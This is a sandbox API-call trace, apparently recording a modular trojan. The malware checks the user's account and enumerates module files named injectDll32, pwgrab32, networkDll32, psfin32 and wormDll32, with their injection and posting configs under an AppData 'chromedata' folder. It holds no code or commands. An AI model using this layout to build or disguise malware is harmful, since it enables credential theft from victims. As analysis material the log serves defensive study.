	[0242.834] GetTokenInformation (in: TokenHandle=0x6e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0242.834] GetLastError () returned 0x7a
	[0242.834] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6378
	[0242.834] GetTokenInformation (in: TokenHandle=0x6e4, TokenInformationClass=0x1, TokenInformation=0x22a6378, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a6378, ReturnLength=0x128c98) returned 1
	[0242.834] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6380*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0242.834] CloseHandle (hObject=0x6e4) returned 1
	[0242.835] CloseHandle (hObject=0x690) returned 1
	[0242.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c05f8
	[0242.835] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b75d8) returned 1
	[0242.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0670
	[0242.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b75d8
	[0242.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311d68
	[0242.835] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0242.835] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0242.835] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0242.835] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0242.835] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0242.835] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0242.835] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0670) returned 1
	[0242.835] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311d68) returned 1
	[0242.835] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b75d8) returned 1
	[0242.835] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b79b0) returned 1
	[0242.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0242.835] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0242.835] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0242.835] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0242.835] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0242.835] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0242.835] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0242.835] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0242.835] Sleep (dwMilliseconds=0x4e20) 
	[0242.867] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.867] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0242.867] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.867] GetFileTime (in: hFile=0x690, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.867] CloseHandle (hObject=0x690) returned 1
	[0242.867] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.868] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.868] GetFileTime (in: hFile=0x690, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.868] CloseHandle (hObject=0x690) returned 1
	[0242.868] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.868] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.868] GetFileTime (in: hFile=0x690, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.868] CloseHandle (hObject=0x690) returned 1
	[0242.868] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.868] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0242.868] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.868] GetFileTime (in: hFile=0x690, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.869] CloseHandle (hObject=0x690) returned 1
	[0242.869] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.869] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0242.869] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.869] GetFileTime (in: hFile=0x690, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.869] CloseHandle (hObject=0x690) returned 1
	[0242.869] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.869] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0242.869] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.869] GetFileTime (in: hFile=0x690, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.869] CloseHandle (hObject=0x690) returned 1
	[0242.869] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.870] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0242.870] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0242.870] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0242.870] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0242.870] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6940
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0242.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b79b0
	[0242.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x234f30
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0242.870] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b79b0, Size=0x10) returned 0x22b75d8
	[0242.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22b6298
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0242.870] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b75d8, Size=0x10) returned 0x22b79b0
	[0242.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22caa30
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0242.870] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b79b0, Size=0x10) returned 0x22b75d8
	[0242.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2738590
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0242.870] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b75d8, Size=0x20) returned 0x27c0670
	[0242.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x24a3b8
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0242.870] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c0670, Size=0x20) returned 0x27c05a8
	[0242.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x271f00
	[0242.870] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0242.870] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c05a8, Size=0x20) returned 0x27c0670
	[0242.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0242.871] FindNextFileW (in: hFindFile=0x22b6940, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0242.871] GetLastError () returned 0x12
	[0242.871] FindClose (in: hFindFile=0x22b6940 | out: hFindFile=0x22b6940) returned 1
	[0242.871] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0242.871] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0242.871] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0242.871] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.871] GetFileTime (in: hFile=0x690, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.871] CloseHandle (hObject=0x690) returned 1
	[0242.871] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.871] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0242.871] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0242.871] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0242.871] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.871] GetFileTime (in: hFile=0x690, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.871] CloseHandle (hObject=0x690) returned 1
	[0242.871] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.872] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0242.872] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0242.872] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0242.872] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.872] GetFileTime (in: hFile=0x690, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.872] CloseHandle (hObject=0x690) returned 1
	[0242.872] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.872] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0242.872] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
